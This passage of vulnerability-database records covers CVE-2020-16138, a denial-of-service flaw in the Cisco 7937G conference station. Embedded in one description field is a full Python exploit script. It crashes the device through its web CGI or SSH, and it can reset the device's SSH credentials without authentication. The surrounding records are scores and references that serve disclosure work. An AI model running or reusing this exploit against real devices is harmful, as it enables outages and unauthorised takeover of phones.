    ],
    "trust": 0.7
  },
  "cve": "CVE-2020-16138",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-009442",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-47312",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-009442",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-16138",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-009442",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-47312",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202008-368",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). \n\r\n\r\nThere are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter\n# Date: 2020-08-10\n# Exploit Author: Cody Martin\n# Vendor Homepage: https://cisco.com\n# Version: \u003c=SIP-1-4-5-7\n# Tested On: SIP-1-4-5-5, SIP-1-4-5-7\n# CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137\n#!/usr/bin/python\n\nimport sys\nimport getopt\nimport requests\nimport paramiko\nimport socket\nimport os\n\n\ndef main(argv):\n    target = \"\"\n    attack = \"\"\n    username = \"\"\n    password = \"\"\n    divider = \"=============================================\"\n\n    help_text = \u0027\u0027\u0027\nexploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]\n%s\nExample: exploit.py -t 192.168.1.200 -a 1\nExample: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa\n%s\nAttack types:\n1: DoS with automatic device reset\n2: DoS without automatic device reset\n3: Change SSH credentials of target device\n\u0027\u0027\u0027 % (divider, divider)\n\n    if len(sys.argv) == 1:\n        print(help_text)\n        sys.exit(2)\n    try:\n        opts, args = getopt.getopt(argv, \"ht:a:u:p:\", [\"help\", \"target=\", \"attack=\", \"user=\", \"password=\"])\n    except getopt.GetoptError:\n        print(help_text)\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt == \"-h\":\n            print(help_text)\n            sys.exit()\n        elif opt in (\"-t\", \"--target\"):\n            target = arg\n        elif opt in (\"-a\", \"--attack\"):\n            attack = arg\n        elif opt in (\"-u\", \"--user\"):\n            username = arg\n        elif opt in (\"-p\", \"--password\"):\n            password = arg\n\n    if username != \"\" and password != \"\" and attack == \"3\":\n        print(\"Starting SSH attack!\")\n        print(divider)\n        print(\"Target: \", target, \"\\nAttack: \", attack, \"\\nUser: \", username, \"\\nPassword: \", password)\n        finished = attack_ssh(target, username, password)\n    elif attack == \"1\":\n        print(\"Starting DoS reset attack!\")\n        print(divider)\n        print(\"Target: \", target, \"\\nAttack: \", attack)\n        finished = dos_one(target)\n    elif attack == \"2\":\n        print(\"Starting DoS non-reset attack!\")\n        print(divider)\n        print(\"Target: \", target, \"\\nAttack: \", attack)\n        finished = dos_two(target)\n\n    print(divider)\n\n    if finished == 1:\n        print(\"DoS reset attack completed!\")\n    elif finished == 2:\n        print(\"DoS non-reset attack completed!\")\n        print(\"Device must be power cycled to restore functionality.\")\n    elif finished == 3:\n        tell = \"SSH attack finished!\\nTry to login using the supplied credentials %s:%s\" % (username, password)\n        connection_example = \"ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s\" % (username, target)\n        print(tell)\n        print(\"You must specify the key exchange when connecting or the device will be DoS\u0027d!\")\n        print(connection_example)\n    elif finished == 0:\n        print(\"Something strange happened. Attack likely unsuccessful.\")\n    sys.exit()\n\n\ndef dos_one(target):\n    url = \"http://%s/localmenus.cgi\" % target\n    data = \"A\"*46\n    payload = {\"func\": \"609\", \"data\": data, \"rphl\": \"1\"}\n    print(\"FIRING ZE MIZZLES!\")\n    for i in range(1000):\n        try:\n            r = requests.post(url=url, params=payload, timeout=5)\n            if r.status_code != 200:\n                print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n                sys.exit()\n        except requests.exceptions.RequestException:\n            return 1\n\n    return 0\n\n\ndef dos_two(target):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.settimeout(15)\n    try:\n        sock.connect((target, 22))\n    except OSError:\n        print(\"Device doesn\u0027t appear to be functioning (already DoS\u0027d?) or SSH is not enabled.\")\n        sys.exit()\n\n    transport = paramiko.Transport(sock=sock, disabled_algorithms={\"kex\": [\"diffie-hellman-group-exchange-sha1\",\n                                                                           \"diffie-hellman-group14-sha1\",\n                                                                           \"diffie-hellman-group1-sha1\"]})\n\n    fd = os.open(\"/dev/null\", os.O_WRONLY)\n    savefd = os.dup(2)\n    os.dup2(fd, 2)\n\n    try:\n        transport.connect(username=\"notreal\", password=\"notreal\")\n    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):\n        os.dup2(savefd, 2)\n        return 2\n\n    return 0\n\n\ndef attack_ssh(target, username, password):\n    url = \"http://%s/localmenus.cgi\" % target\n    payload_user = {\"func\": \"403\", \"set\": \"401\", \"name1\": username, \"name2\": username}\n    payload_pass = {\"func\": \"403\", \"set\": \"402\", \"pwd1\": password, \"pwd2\": password}\n    print(\"FIRING ZE MIZZLES!\")\n    try:\n        r = requests.post(url=url, params=payload_user, timeout=5)\n        if r.status_code != 200:\n            print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n            sys.exit()\n\n        r = requests.post(url=url, params=payload_pass, timeout=5)\n        if r.status_code != 200:\n            print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n            sys.exit()\n    except requests.exceptions.RequestException:\n        print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n        sys.exit()\n\n    return 3\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "PACKETSTORM",
        "id": "158817"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-16138",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "158819",
        "trust": 2.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "158817",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "PACKETSTORM",
        "id": "158817"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "id": "VAR-202008-0711",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      }
    ]
  },
  "last_update_date": "2024-05-17T22:59:26.471000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "End-of-Sale and End-of-Life Announcement for the Cisco Unified IP Conference Station 7937G",
        "trust": 0.8,
        "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "https://packetstormsecurity.com/files/158819/cisco-7937g-denial-of-service.html"
      },
      {
        "trust": 2.4,
        "url": "https://www.blacklanternsecurity.com/2020-08-07-cisco-unified-ip-conference-station-7937g/"
      },
      {
        "trust": 1.6,
        "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16138"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16138"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16137"
      },
      {
        "trust": 0.1,
        "url": "https://cisco.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16139"
      },
      {
        "trust": 0.1,
        "url": "http://%s/localmenus.cgi\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "PACKETSTORM",
        "id": "158817"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "db": "PACKETSTORM",
        "id": "158817"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "date": "2020-11-05T09:23:10",
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "date": "2020-08-10T19:02:33",
        "db": "PACKETSTORM",
        "id": "158817"
      },
      {
        "date": "2020-08-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "date": "2020-08-12T21:15:12.063000",
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "date": "2020-11-05T09:23:10",
        "db": "JVNDB",
        "id": "JVNDB-2020-009442"
      },
      {
        "date": "2020-08-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      },
      {
        "date": "2024-05-17T01:43:44.680000",
        "db": "NVD",
        "id": "CVE-2020-16138"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco 7937G input validation error vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-47312"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-368"
      }
    ],
    "trust": 0.6
  }
}

GSD-2020-16138

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.

Aliases

CVE-2020-16138

Aliases

CVE-2020-16138

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-16138",
    "description": "** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information.",
    "id": "GSD-2020-16138",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-16138"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-16138"
      ],
      "details": "** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information.",
      "id": "GSD-2020-16138",
      "modified": "2023-12-13T01:21:46.213691Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2020-16138",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html",
            "refsource": "MISC",
            "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
          },
          {
            "name": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/",
            "refsource": "MISC",
            "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
          },
          {
            "name": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html",
            "refsource": "MISC",
            "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "55A411E1-7568-4E8C-8AA7-B1B088769C69",
                    "versionEndIncluding": "1.4.5.7",
                    "versionStartIncluding": "1.4.4.0",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              },
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:h:cisco:unified_ip_conference_station_7937g:-:*:*:*:*:*:*:*",
                    "matchCriteriaId": "F7059B88-1FA4-45DB-9344-296E6F23968D",
                    "vulnerable": false
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ],
            "operator": "AND"
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information"
          },
          {
            "lang": "es",
            "value": "** NO SOPORTADO CUANDO FUE ASIGNADO ** Un problema de denegaci\u00f3n de servicio en Cisco Unified IP Conference Station 7937G versiones 1-4-4-0 hasta 1-4-5-7, permite a atacantes deshabilitar de remotamente el dispositivo hasta que se apaga y enciende. Nota: No podemos probar que esta vulnerabilidad exista. Por precauci\u00f3n, este CVE se asigna para brindar un mejor servicio a nuestros clientes y garantizar que todos los que a\u00fan usan este producto comprendan que el producto est\u00e1 al final de su vida \u00fatil y que debe ser eliminado o actualizado. Para m\u00e1s informaci\u00f3n sobre esto y c\u00f3mo actualizar, consulte la informaci\u00f3n de referencia del CVE"
          }
        ],
        "id": "CVE-2020-16138",
        "lastModified": "2024-04-11T01:07:20.270",
        "metrics": {
          "cvssMetricV2": [
            {
              "acInsufInfo": false,
              "baseSeverity": "HIGH",
              "cvssData": {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              "exploitabilityScore": 10.0,
              "impactScore": 6.9,
              "obtainAllPrivilege": false,
              "obtainOtherPrivilege": false,
              "obtainUserPrivilege": false,
              "source": "nvd@nist.gov",
              "type": "Primary",
              "userInteractionRequired": false
            }
          ],
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            }
          ]
        },
        "published": "2020-08-12T21:15:12.063",
        "references": [
          {
            "source": "cve@mitre.org",
            "tags": [
              "Exploit",
              "Third Party Advisory",
              "VDB Entry"
            ],
            "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
          },
          {
            "source": "cve@mitre.org",
            "tags": [
              "Exploit",
              "Third Party Advisory"
            ],
            "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
          },
          {
            "source": "cve@mitre.org",
            "tags": [
              "Vendor Advisory"
            ],
            "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
          }
        ],
        "sourceIdentifier": "cve@mitre.org",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "NVD-CWE-noinfo"
              }
            ],
            "source": "nvd@nist.gov",
            "type": "Primary"
          }
        ]
      }
    }
  }
}

FKIE_CVE-2020-16138

Vulnerability from fkie_nvd - Published: 2020-08-12 21:15 - Updated: 2024-11-21 05:06

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
cve@mitre.org	https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/	Exploit, Third Party Advisory
cve@mitre.org	https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html	Vendor Advisory

Impacted products

	Vendor	Product	Version
	cisco	unified_ip_conference_station_7937g_firmware	*
	cisco	unified_ip_conference_station_7937g	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "55A411E1-7568-4E8C-8AA7-B1B088769C69",
              "versionEndIncluding": "1.4.5.7",
              "versionStartIncluding": "1.4.4.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:unified_ip_conference_station_7937g:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7059B88-1FA4-45DB-9344-296E6F23968D",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [
    {
      "sourceIdentifier": "cve@mitre.org",
      "tags": [
        "unsupported-when-assigned"
      ]
    }
  ],
  "descriptions": [
    {
      "lang": "en",
      "value": "A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information"
    },
    {
      "lang": "es",
      "value": "** NO SOPORTADO CUANDO FUE ASIGNADO ** Un problema de denegaci\u00f3n de servicio en Cisco Unified IP Conference Station 7937G versiones 1-4-4-0 hasta 1-4-5-7, permite a atacantes deshabilitar de remotamente el dispositivo hasta que se apaga y enciende. Nota: No podemos probar que esta vulnerabilidad exista. Por precauci\u00f3n, este CVE se asigna para brindar un mejor servicio a nuestros clientes y garantizar que todos los que a\u00fan usan este producto comprendan que el producto est\u00e1 al final de su vida \u00fatil y que debe ser eliminado o actualizado. Para m\u00e1s informaci\u00f3n sobre esto y c\u00f3mo actualizar, consulte la informaci\u00f3n de referencia del CVE"
    }
  ],
  "id": "CVE-2020-16138",
  "lastModified": "2024-11-21T05:06:50.017",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
